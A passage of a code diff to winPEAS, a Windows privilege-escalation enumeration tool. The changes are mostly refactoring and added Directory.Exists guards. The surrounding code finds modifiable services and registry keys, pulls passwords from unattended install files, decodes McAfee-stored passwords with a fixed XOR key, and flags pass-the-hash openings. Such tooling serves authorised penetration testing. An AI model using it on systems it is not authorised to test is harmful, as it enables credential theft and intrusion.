                Beaprint.GrayPrint("   - Creating disabled users list...");
-                Checks.PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
-                PaintDisabledUsersNoAdministrator = Checks.PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
+                PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
+                PaintDisabledUsersNoAdministrator = PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
            }
            catch (Exception ex)
            {
@@ -411,7 +411,7 @@ namespace winPEAS.Checks
            try
            {
                if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
-                    System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    Console.WriteLine(@"ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
            }
            catch (Exception ex)
            {
@@ -425,7 +425,7 @@ namespace winPEAS.Checks
            {
                if (RegistryHelper.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\FileSystem", "LongPathsEnabled") != "1")
                {
-                    System.Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
+                    Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
                    IsLongPath = false;
                }
                else
--- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
@@ -118,7 +118,8 @@ namespace winPEAS.Checks

                if (isFileFound)
                {
-                    if (!somethingFound) {
+                    if (!somethingFound)
+                    {
                        Beaprint.MainPrint($"Found {searchName} Files");
                        somethingFound = true;
                    }
@@ -352,7 +353,7 @@ namespace winPEAS.Checks

                                    try
                                    {
-                                        string text = System.IO.File.ReadAllText(f.FullPath);
+                                        string text = File.ReadAllText(f.FullPath);

                                        results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
                                        if (results.Count > 0)
@@ -460,8 +461,10 @@ namespace winPEAS.Checks

            if (fileSettings.type == "f")
            {
-                var colors = new Dictionary<string, string>();
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                var colors = new Dictionary<string, string>
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                Beaprint.AnsiPrint($"File: {fileInfo.FullPath}", colors);

                if (!(bool)fileSettings.just_list_file)
@@ -471,8 +474,10 @@ namespace winPEAS.Checks
            }
            else if (fileSettings.type == "d")
            {
-                var colors = new Dictionary<string, string>();
-                colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
+                var colors = new Dictionary<string, string>
+                {
+                    { fileInfo.Filename, Beaprint.ansi_color_bad }
+                };
                Beaprint.AnsiPrint($"Folder: {fileInfo.FullPath}", colors);

                // just list the directory
--- a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
                    {
                        string formString = "    {0} ({1})\n    Accessed:{2} -- Size:{3}";
                        Beaprint.BadPrint(string.Format(formString, cc["file"], cc["Description"], cc["Accessed"], cc["Size"]));
-                        System.Console.WriteLine("");
+                        Console.WriteLine("");
                    }
                }
                else
@@ -182,7 +182,7 @@ namespace winPEAS.Checks
                {
                    List<string> pwds = Unattended.ExtractUnattendedPwd(path);
                    Beaprint.BadPrint("    " + path);
-                    System.Console.WriteLine(string.Join("\n", pwds));
+                    Console.WriteLine(string.Join("\n", pwds));
                }
            }
            catch (Exception ex)
@@ -480,7 +480,7 @@ namespace winPEAS.Checks
                        if (Regex.Match(rec_file["Name"], pattern.Replace("*", ".*"), RegexOptions.IgnoreCase).Success)
                        {
                            Beaprint.DictPrint(rec_file, colorF, true);
-                            System.Console.WriteLine();
+                            Console.WriteLine();
                        }
                    }
                }
--- a/winPEAS/winPEASexe/winPEAS/Checks/NetworkInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/NetworkInfo.cs
@@ -81,7 +81,7 @@ namespace winPEAS.Checks
                {
                    if (line.Length > 0 && line[0] != '#')
                    {
-                        System.Console.WriteLine("    " + line.Replace("\t", "    "));
+                        Console.WriteLine("    " + line.Replace("\t", "    "));
                    }
                }
            }
@@ -304,8 +304,8 @@ namespace winPEAS.Checks
                Beaprint.GrayPrint("    DENY rules:");
                foreach (Dictionary<string, string> rule in Firewall.GetFirewallRules())
                {
-                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
-                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
+                    string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], Checks.CurrentUserSiDs));
+                    string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], Checks.CurrentUserSiDs));
                    string formString = "    ({0}){1}[{2}]: {3} {4} {5} from {6} --> {7}";
                    if (filePerms.Length > 0)
                        formString += "\n    File Permissions: {8}";
--- a/winPEAS/winPEASexe/winPEAS/Checks/ServicesInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ServicesInfo.cs
@@ -20,7 +20,7 @@ namespace winPEAS.Checks
            {
                CheckRunner.Run(() =>
                {
-                    modifiableServices = ServicesInfoHelper.GetModifiableServices(winPEAS.Checks.Checks.CurrentUserSiDs);
+                    modifiableServices = ServicesInfoHelper.GetModifiableServices(Checks.CurrentUserSiDs);
                }, isDebug);
            }
            catch (Exception ex)
@@ -53,12 +53,12 @@ namespace winPEAS.Checks

                foreach (Dictionary<string, string> serviceInfo in services_info)
                {
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], Checks.CurrentUserSiDs);
                    List<string> dirRights = new List<string>();

                    if (serviceInfo["FilteredPath"] != null && serviceInfo["FilteredPath"] != "")
                    {
-                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), winPEAS.Checks.Checks.CurrentUserSiDs);
+                        dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), Checks.CurrentUserSiDs);
                    }

                    bool noQuotesAndSpace = MyUtils.CheckQuoteAndSpace(serviceInfo["PathName"]);
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
            {
                Beaprint.MainPrint("Looking if you can modify any service registry");
                Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions", "Check if you can modify the registry of a service");
-                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(Checks.CurrentUserSiDs);

                Dictionary<string, string> colorsWR = new Dictionary<string, string>()
                            {
--- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
@@ -5,21 +5,21 @@ using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
+using winPEAS._3rdParty.Watson;
 using winPEAS.Helpers;
 using winPEAS.Helpers.AppLocker;
-using winPEAS._3rdParty.Watson;
-using winPEAS.Info.SystemInfo.Printers;
-using winPEAS.Info.SystemInfo.NamedPipes;
-using winPEAS.Info.SystemInfo;
-using winPEAS.Info.SystemInfo.SysMon;
 using winPEAS.Helpers.Extensions;
 using winPEAS.Helpers.Registry;
+using winPEAS.Info.SystemInfo;
 using winPEAS.Info.SystemInfo.AuditPolicies;
 using winPEAS.Info.SystemInfo.DotNet;
 using winPEAS.Info.SystemInfo.GroupPolicy;
-using winPEAS.Info.SystemInfo.WindowsDefender;
-using winPEAS.Info.SystemInfo.PowerShell;
+using winPEAS.Info.SystemInfo.NamedPipes;
 using winPEAS.Info.SystemInfo.Ntlm;
+using winPEAS.Info.SystemInfo.PowerShell;
+using winPEAS.Info.SystemInfo.Printers;
+using winPEAS.Info.SystemInfo.SysMon;
+using winPEAS.Info.SystemInfo.WindowsDefender;
 using winPEAS.Native.Enums;

 namespace winPEAS.Checks
@@ -107,7 +107,7 @@ namespace winPEAS.Checks
                    { Globals.StrTrue, Beaprint.ansi_color_bad },
                };
                Beaprint.DictPrint(basicDictSystem, colorsSI, false);
-                System.Console.WriteLine();
+                Console.WriteLine();
                Watson.FindVulns();

                //To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
@@ -369,12 +369,12 @@ namespace winPEAS.Checks

            if (lsaCfgFlags == "1")
            {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                Beaprint.GoodPrint("    CredentialGuard is active with UEFI lock");
            }
            else if (lsaCfgFlags == "2")
            {
-                System.Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
+                Console.WriteLine("    Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
                Beaprint.GoodPrint("    CredentialGuard is active without UEFI lock");
            }
            else
@@ -572,7 +572,7 @@ namespace winPEAS.Checks
                    else if (using_HKLM_WSUS == "0")
                        Beaprint.GoodPrint("    But UseWUServer is equals to 0, so it is not vulnerable!");
                    else
-                        System.Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
+                        Console.WriteLine("    But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
                }
                else
                {
@@ -1070,7 +1070,7 @@ namespace winPEAS.Checks
                        }
                        else if (kvp.Value.GetType().IsArray && (kvp.Value.GetType().GetElementType().ToString() == "System.Byte"))
                        {
-                            val = System.BitConverter.ToString((byte[])kvp.Value);
+                            val = BitConverter.ToString((byte[])kvp.Value);
                        }
                        else
                        {
@@ -1086,12 +1086,12 @@ namespace winPEAS.Checks
                            Beaprint.BadPrint("    [!]      WDigest is enabled - plaintext password extraction is possible!");
                        }

-                        if (key.Equals("RunAsPPL", System.StringComparison.InvariantCultureIgnoreCase) && val == "1")
+                        if (key.Equals("RunAsPPL", StringComparison.InvariantCultureIgnoreCase) && val == "1")
                        {
                            Beaprint.BadPrint("    [!]      LSASS Protected Mode is enabled! You will not be able to access lsass.exe's memory easily.");
                        }

-                        if (key.Equals("DisableRestrictedAdmin", System.StringComparison.InvariantCultureIgnoreCase) && val == "0")
+                        if (key.Equals("DisableRestrictedAdmin", StringComparison.InvariantCultureIgnoreCase) && val == "0")
                        {
                            Beaprint.BadPrint("    [!]      RDP Restricted Admin Mode is enabled! You can use pass-the-hash to access RDP on this system.");
                        }
--- a/winPEAS/winPEASexe/winPEAS/Checks/UserInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/UserInfo.cs
@@ -1,8 +1,6 @@
 using System;
 using System.Collections.Generic;
-using System.ComponentModel;
 using System.Runtime.InteropServices;
-using System.Security.Cryptography;
 using System.Security.Principal;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Extensions;
@@ -158,7 +156,7 @@ namespace winPEAS.Checks
            try
            {
                Beaprint.MainPrint("RDP Sessions");
-                List<Dictionary<string, string>> rdp_sessions = Info.UserInfo.UserInfoHelper.GetRDPSessions();
+                List<Dictionary<string, string>> rdp_sessions = UserInfoHelper.GetRDPSessions();
                if (rdp_sessions.Count > 0)
                {
                    string format = "    {0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}";
@@ -263,7 +261,7 @@ namespace winPEAS.Checks
            {
                Beaprint.MainPrint("Password Policies");
                Beaprint.LinkPrint("", "Check for a possible brute-force");
-                List<Dictionary<string, string>> PPy = Info.UserInfo.UserInfoHelper.GetPasswordPolicy();
+                List<Dictionary<string, string>> PPy = UserInfoHelper.GetPasswordPolicy();
                Beaprint.DictPrint(PPy, ColorsU(), false);
            }
            catch (Exception ex)
--- a/winPEAS/winPEASexe/winPEAS/Helpers/AppLocker/AppLockerHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/AppLocker/AppLockerHelper.cs
@@ -327,6 +327,8 @@ namespace winPEAS.Helpers.AppLocker
            if (depth == FolderCheckMaxDepth) return false;

            try
+            {
+                if (Directory.Exists(path))
                {
                    var subfolders = Directory.EnumerateDirectories(path);
                    var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
@@ -363,6 +365,7 @@ namespace winPEAS.Helpers.AppLocker
                        return true;
                    }
                }
+            }
            catch (Exception)
            {
            }
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
@@ -1,7 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.Text.RegularExpressions;
-using System.Threading;

 namespace winPEAS.Helpers
 {
--- a/winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/Credential.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/Credential.cs
@@ -4,7 +4,6 @@ using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.Permissions;
-using System.Text;
 using winPEAS.Native;
 using winPEAS.Native.Enums;

--- a/winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/NativeMethods.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/CredentialManager/NativeMethods.cs
@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32.SafeHandles;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Linq;
 using System.Runtime.InteropServices;
-using Microsoft.Win32.SafeHandles;
 using winPEAS.Native;

 namespace winPEAS.Helpers.CredentialManager
--- a/winPEAS/winPEASexe/winPEAS/Helpers/DomainHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/DomainHelper.cs
@@ -1,5 +1,4 @@
 using System;
-using System.Runtime.InteropServices;
 using winPEAS.Native;
 using winPEAS.Native.Enums;

--- a/winPEAS/winPEASexe/winPEAS/Helpers/HandlesHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/HandlesHelper.cs
@@ -1,11 +1,9 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.Helpers
 {
@@ -438,9 +436,11 @@ namespace winPEAS.Helpers
        // Get the owner of a process given the PID
        public static Dictionary<string, string> GetProcU(Process p)
        {
-            Dictionary<string, string> data = new Dictionary<string, string>();
-            data["name"] = "";
-            data["sid"] = "";
+            Dictionary<string, string> data = new Dictionary<string, string>
+            {
+                ["name"] = "",
+                ["sid"] = ""
+            };
            IntPtr pHandle = IntPtr.Zero;
            try
            {
@@ -586,7 +586,7 @@ namespace winPEAS.Helpers
            { // This shouldn't be needed
                if (path.StartsWith("\\"))
                    path = path.Substring(1);
-                hive = Helpers.Registry.RegistryHelper.CheckIfExists(path);
+                hive = Registry.RegistryHelper.CheckIfExists(path);
            }

            if (path.StartsWith("\\"))
--- a/winPEAS/winPEASexe/winPEAS/Helpers/MemoryHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/MemoryHelper.cs
@@ -1,5 +1,4 @@
-using System;
-using System.Diagnostics;
+using System.Diagnostics;

 namespace winPEAS.Helpers
 {
--- a/winPEAS/winPEASexe/winPEAS/Helpers/PermissionsHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/PermissionsHelper.cs
@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Security.AccessControl;
 using System.Security.Principal;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;

 namespace winPEAS.Helpers
 {
@@ -353,6 +353,8 @@ namespace winPEAS.Helpers
            {
                results[path] = String.Join(", ", GetPermissionsFolder(path, Checks.Checks.CurrentUserSiDs));
                if (string.IsNullOrEmpty(results[path]))
+                {
+                    if (Directory.Exists(path))
                    {
                        foreach (string d in Directory.EnumerateDirectories(path))
                        {
@@ -365,6 +367,7 @@ namespace winPEAS.Helpers
                        }
                    }
                }
+            }
            catch
            {
                //Access denied to a path
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
@@ -1,7 +1,7 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Linq;
-using Microsoft.Win32;

 namespace winPEAS.Helpers.Registry
 {
@@ -177,7 +177,7 @@ namespace winPEAS.Helpers.Registry

        internal static uint? GetDwordValue(string hive, string key, string val)
        {
-            string strValue = RegistryHelper.GetRegValue(hive, key, val);
+            string strValue = GetRegValue(hive, key, val);

            if (uint.TryParse(strValue, out uint res))
            {
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Search/SearchHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Search/SearchHelper.cs
@@ -221,43 +221,43 @@ namespace winPEAS.Helpers.Search
        {
            // c:\users
            string rootUsersSearchPath = $"{SystemDrive}\\Users\\";
-            SearchHelper.RootDirUsers = SearchHelper.GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirUsers = GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);

            // c:\users\current_user
            string rootCurrentUserSearchPath = Environment.GetEnvironmentVariable("USERPROFILE");
-            SearchHelper.RootDirCurrentUser = SearchHelper.GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirCurrentUser = GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);

            // c:\Program Files\
            string rootProgramFiles = $"{SystemDrive}\\Program Files\\";
-            SearchHelper.ProgramFiles = SearchHelper.GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
+            ProgramFiles = GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);

            // c:\Program Files (x86)\
            string rootProgramFilesX86 = $"{SystemDrive}\\Program Files (x86)\\";
-            SearchHelper.ProgramFilesX86 = SearchHelper.GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
+            ProgramFilesX86 = GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);

            // c:\Documents and Settings\
            string documentsAndSettings = $"{SystemDrive}\\Documents and Settings\\";
-            SearchHelper.DocumentsAndSettings = SearchHelper.GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
+            DocumentsAndSettings = GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);

            // c:\ProgramData\Microsoft\Group Policy\History
            string groupPolicyHistory = $"{SystemDrive}\\ProgramData\\Microsoft\\Group Policy\\History";
-            SearchHelper.GroupPolicyHistory = SearchHelper.GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
+            GroupPolicyHistory = GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);

            // c:\Documents and Settings\All Users\Application Data\\Microsoft\\Group Policy\\History
            string groupPolicyHistoryLegacy = $"{documentsAndSettings}\\All Users\\Application Data\\Microsoft\\Group Policy\\History";
            //SearchHelper.GroupPolicyHistoryLegacy = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, globalPattern);
-            var groupPolicyHistoryLegacyFiles = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
-            SearchHelper.GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
+            var groupPolicyHistoryLegacyFiles = GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
+            GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
        }

        internal static void CleanLists()
        {
-            SearchHelper.RootDirUsers = null;
-            SearchHelper.RootDirCurrentUser = null;
-            SearchHelper.ProgramFiles = null;
-            SearchHelper.ProgramFilesX86 = null;
-            SearchHelper.DocumentsAndSettings = null;
-            SearchHelper.GroupPolicyHistory = null;
+            RootDirUsers = null;
+            RootDirCurrentUser = null;
+            ProgramFiles = null;
+            ProgramFilesX86 = null;
+            DocumentsAndSettings = null;
+            GroupPolicyHistory = null;

            GC.Collect();
        }
@@ -270,7 +270,7 @@ namespace winPEAS.Helpers.Search
                ".*password.*"
            };

-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
            {
                //string extLower = file.Extension.ToLower();

@@ -297,7 +297,7 @@ namespace winPEAS.Helpers.Search
        {
            var result = new List<string>();

-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
            {
                if (!file.IsDirectory)
                {
@@ -337,7 +337,7 @@ namespace winPEAS.Helpers.Search
                ".xml"
            };

-            foreach (var file in SearchHelper.GroupPolicyHistory)
+            foreach (var file in GroupPolicyHistory)
            {
                if (!file.IsDirectory)
                {
@@ -361,14 +361,14 @@ namespace winPEAS.Helpers.Search
            };

            string programDataPath = $"{SystemDrive}\\ProgramData\\";
-            var programData = SearchHelper.GetFilesFast(programDataPath, GlobalPattern);
+            var programData = GetFilesFast(programDataPath, GlobalPattern);

            var searchFiles = new List<CustomFileInfo>();
-            searchFiles.AddRange(SearchHelper.ProgramFiles);
-            searchFiles.AddRange(SearchHelper.ProgramFilesX86);
+            searchFiles.AddRange(ProgramFiles);
+            searchFiles.AddRange(ProgramFilesX86);
            searchFiles.AddRange(programData);
-            searchFiles.AddRange(SearchHelper.DocumentsAndSettings);
-            searchFiles.AddRange(SearchHelper.RootDirUsers);
+            searchFiles.AddRange(DocumentsAndSettings);
+            searchFiles.AddRange(RootDirUsers);

            foreach (var file in searchFiles)
            {
@@ -403,7 +403,7 @@ namespace winPEAS.Helpers.Search
                ".pdf",
            };

-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
            {
                if (!file.IsDirectory)
                {
@@ -451,7 +451,7 @@ namespace winPEAS.Helpers.Search
                ".pdf",
            };

-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
            {
                if (!file.IsDirectory)
                {
--- a/winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfig.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfig.cs
@@ -8,7 +8,8 @@ namespace winPEAS.Helpers.YamlConfig
        {
            public string name { get; set; }
            public RegularExpression[] regexes { get; set; }
-            public class RegularExpression {
+            public class RegularExpression
+            {
                public string name { get; set; }
                public string regex { get; set; }

--- a/winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfigHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfigHelper.cs
@@ -1,10 +1,9 @@
 using System.Collections.Generic;
-using System.Yaml.Serialization;
 using System.IO;
-using System.Reflection;
 using System.Linq;
+using System.Reflection;
+using System.Yaml.Serialization;
 using static winPEAS.Helpers.YamlConfig.YamlConfig;
-using static winPEAS.Helpers.YamlConfig.YamlRegexConfig;


 namespace winPEAS.Helpers.YamlConfig
--- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/ApplicationInfoHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/ApplicationInfoHelper.cs
@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Runtime.InteropServices;
 using System.Text;
 using winPEAS.Helpers;
 using winPEAS.Native;
--- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
@@ -1,10 +1,10 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Management;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

@@ -343,6 +343,8 @@ namespace winPEAS.Info.ApplicationInfo
            usersPath = Directory.GetParent(usersPath).FullName;

            try
+            {
+                if (Directory.Exists(usersPath))
                {
                    var userDirs = Directory.EnumerateDirectories(usersPath);

@@ -356,6 +358,7 @@ namespace winPEAS.Info.ApplicationInfo
                        }
                    }
                }
+            }
            catch (Exception)
            {
            }
@@ -363,6 +366,8 @@ namespace winPEAS.Info.ApplicationInfo
            foreach (string path in autorunLocations)
            {
                try
+                {
+                    if (Directory.Exists(path))
                    {
                        var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);

@@ -382,6 +387,7 @@ namespace winPEAS.Info.ApplicationInfo
                            });
                        }
                    }
+                }
                catch (Exception)
                {
                }
--- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/InstalledApps.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/InstalledApps.cs
@@ -70,6 +70,8 @@ namespace winPEAS.Info.ApplicationInfo
        {
            var results = new SortedDictionary<string, Dictionary<string, string>>();
            try
+            {
+                if (Directory.Exists(fpath))
                {
                    foreach (string f in Directory.EnumerateFiles(fpath))
                    {
@@ -83,6 +85,7 @@ namespace winPEAS.Info.ApplicationInfo
                        results[d] = PermissionsHelper.GetRecursivePrivs(d);
                    }
                }
+            }
            catch (Exception ex)
            {
                Beaprint.GrayPrint("Error: " + ex);
--- a/winPEAS/winPEASexe/winPEAS/Info/EventsInfo/ProcessCreation/ProcessCreation.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/EventsInfo/ProcessCreation/ProcessCreation.cs
@@ -1,6 +1,5 @@
 using System.Collections.Generic;
 using winPEAS.Helpers;
-using winPEAS.Info.EventsInfo.PowerShell;

 namespace winPEAS.Info.EventsInfo.ProcessCreation
 {
--- a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/McAfee/McAfee.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/McAfee/McAfee.cs
@@ -127,7 +127,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
            byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };

            // xor the input b64 string with the static XOR key
-            var passwordBytes = System.Convert.FromBase64String(base64password);
+            var passwordBytes = Convert.FromBase64String(base64password);
            for (var i = 0; i < passwordBytes.Length; i++)
            {
                passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
--- a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Office/Office.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Office/Office.cs
@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Globalization;
 using System.Linq;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.FilesInfo.Office.OneDrive;
--- a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Firewall.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Firewall.cs
@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Reflection;
 using System.Runtime.InteropServices;
 using winPEAS.Helpers;

--- a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/ProcessesInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/ProcessesInfo.cs
@@ -6,7 +6,6 @@ using System.Linq;
 using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
 using System.Text.RegularExpressions;
 using System.Threading.Tasks;
 using winPEAS.Helpers;
@@ -33,7 +32,7 @@ namespace winPEAS.Info.ProcessInfo
                                    Proc = p,
                                    Pth = (string)mo["ExecutablePath"],
                                    CommLine = (string)mo["CommandLine"],
-                                    Owner = Helpers.HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
+                                    Owner = HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
                                };

                    foreach (var itm in queRy)
@@ -54,14 +53,16 @@ namespace winPEAS.Info.ProcessInfo
                            }
                            if ((string.IsNullOrEmpty(companyName)) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                            {
-                                Dictionary<string, string> to_add = new Dictionary<string, string>();
-                                to_add["Name"] = itm.Proc.ProcessName;
